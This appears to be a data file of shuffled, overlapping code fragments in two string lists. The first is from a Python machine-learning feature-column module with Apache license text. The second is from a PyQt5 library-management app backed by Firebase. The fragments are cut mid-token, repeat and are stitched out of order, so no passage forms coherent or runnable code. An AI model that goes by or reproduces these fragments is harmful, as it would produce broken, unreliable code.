Data to be used in training, prediction and evaluation", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "functionality to define those features, and data transformations to apply to produce those", "If it is not empty, then the words will be replaced with a", "name: Name of feature column. default: Default value for the column. frequency_threshold: Frequency", "instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the", "which words are not added to the vocab. split_regex: Regex rule to extract", "column. default: Default value for the column. log_base: Base of logarithm to be", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name,", "for constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "Frequency threshold below which words/ngrams are not added to the vocab. Returns: An", "generate (2 for bigrams etc) use_tf_idf: Boolean on whether the BOW representation should", "FeatureProducer from _registries import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter", "within a feature.. Args: name: name of image feature default: Default value for", "representing the target label or value of the instance. 
Args: name: Name of", "of ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on", "from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from", "for the number of rows that should be sampled for constructing the vocabulary/ngrams.", "FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn", "number of rows that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex", "removed before processing removable_tags: list of html tags whose text should be ignored", "specifying the stop words to be ignored or a string representing the language", "TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within", "rows that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to", "word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature. Args: name:", "def image(name, default=None): \"\"\"Creates an image column within a feature.. Args: name: name", "an image column within a feature.. Args: name: name of image feature default:", "Args: name: Name of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return", "Version 2.0 (the \"License\"); # you may not use this file except in", "An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing", "except in compliance with the License. 
# You may obtain a copy of", "import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from _features import", "_predict import FeatureProducer from _registries import register_analyzer from _registries import register_transformer from _transforms", "removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature. Args:", "An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer,", "Regex rule to extract the column value. Defaults to None, which means no", "_features import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from _registries", "one row for each word frequency_threshold: Frequency threshold below which words/ngrams are not", "column value. Defaults to None, which means no splitting. Examples: - Use r'\\w{1,}'", "sparse vector (BOW or tf*idf) should be normalize (used with L2 norm) strip_html:", "of word -> word_vectors. If it is not empty, then the words will", "of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates", "Args: name: Name of feature column. default: Default value for the column. frequency_threshold:", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words:", "r'\\w{3,}' to group alphanumerical characters of len 3. 
- Use r'\\S+' to group", "categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within a", "of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target", "name: Name of feature column. default: Default value for the column. sampling_percentage: Percentage", "value for the column. Returns: An instance of ImageFeatureColumn. \"\"\" return ImageFeatureColumn(name, default=default)", "be removed before processing removable_tags: list of html tags whose text should be", "name: Name of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name)", "the vocab. split_regex: Regex rule to extract the column value. Defaults to None,", "used in training, prediction and evaluation is described in terms of features. This", "_features import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from _features", "tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf) should be normalize", "1. - Use r'\\w{3,}' to group alphanumerical characters of len 3. - Use", "group alphanumerical characters of len 3. - Use r'\\S+' to group on non-whitespace.", "word -> word_vectors. If it is not empty, then the words will be", "value for the column. sampling_percentage: Percentage value (0-100) for the number of rows", "extract the column value. Defaults to None, which means no splitting. Examples: -", "column. log_base: Base of logarithm to be applied. Returns: An instance of NumericFeatureColumn.", "to be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base)", "transformations to apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn from", "instance. Args: name: Name of feature column. Returns: An instance of TargetFeatureColumn. 
\"\"\"", "Args: name: Name of feature column. default: Default value for the column. sampling_percentage:", "to extract the column value. Defaults to None, which means no splitting. Examples:", "for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should", "(0-100) for the number of rows that should be sampled for constructing the", "default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args: name: Name of", "on whether html_markup should be removed before processing removable_tags: list of html tags", "of features. This module provides functionality to define those features, and data transformations", "in terms of features. This module provides functionality to define those features, and", "number of ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean", "split_regex: Regex rule to extract the column value. Defaults to None, which means", "use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column", "log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column", "ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on whether", "FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn", "from _features import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from", "use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an", "name, default=default, 
sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold)", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "_features import Feature from _features import FeatureColumn from _features import FeatureFormat from _features", "which means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of", "to group alphanumerical characters of len 1. - Use r'\\w{3,}' to group alphanumerical", "\"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a", "whether sparse vector (BOW or tf*idf) should be normalize (used with L2 norm)", "tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on whether the BOW", "sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either", "terms of features. This module provides functionality to define those features, and data", "be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def", "words are not added to the vocab. split_regex: Regex rule to extract the", "target label or value of the instance. Args: name: Name of feature column.", "ignored word2vec_dict: Dictionary of word -> word_vectors. If it is not empty, then", "splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of len 1. -", "Base of logarithm to be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return", "Default value for the column. log_base: Base of logarithm to be applied. Returns:", "categorical or discrete value column within a feature. Args: name: Name of feature", "of feature column. default: Default value for the column. 
log_base: Base of logarithm", "removable_tags: list of html tags whose text should be ignored word2vec_dict: Dictionary of" ]
[ "import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import", "def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(),", "= QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 =", "Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore", "QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow", "self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1)", "self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == ''", "self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) 
self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self):", "campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4)", "self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4", "result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn ==", "'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800,", "firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar)", "QMessageBox, QApplication import sys 
from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as", "QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro =", "isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv) show_main =", "self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow,", "Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow", "self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text()", "as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import", "self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo", "#self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return", "self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = 
QApplication(sys.argv) show_main = Main() sys.exit(app.exec_())", "from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from", "Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro", "Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os", "== '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2)", "'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def", "= Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5)", "if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv) show_main", "self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig)", "PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys", "self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): 
super(Main, self).__init__(parent) self.setupUi(self) self._firebase", "Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig =", "QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login", "\"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0", "self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn =", "= QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login =", "Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro)", "from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import", "self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm)", "def listar_livros(self): self.QtStack.setCurrentIndex(3) 
def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def", "Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro", "def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro)", "PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain':", "from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from", "import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\",", "= { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId':", "== self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv) show_main = Main()", "Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import firebase", "self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def 
admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text()", "self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self,", "self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self):", "firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\",", "Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow()", "Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro()", "livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' :", "import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from", "'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack", "from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from", "\"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class 
Ui_Main(QtWidgets.QWidget): def setupUi(self,", "self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm)", "self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar)", "import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\",", "'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def", "} self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = 
self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn", "self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main):", "self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm)", "= self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase()", "\"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"}", "edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self):", "pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL':", 
"self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo", "as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as", "sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro", "import os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = {", "Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro()", "self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if", "Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros)", "= QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1)", "Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot", "= Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = 
Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1)", "{ 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\",", "def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1", "self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or", "invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def", "self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self)", "super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) 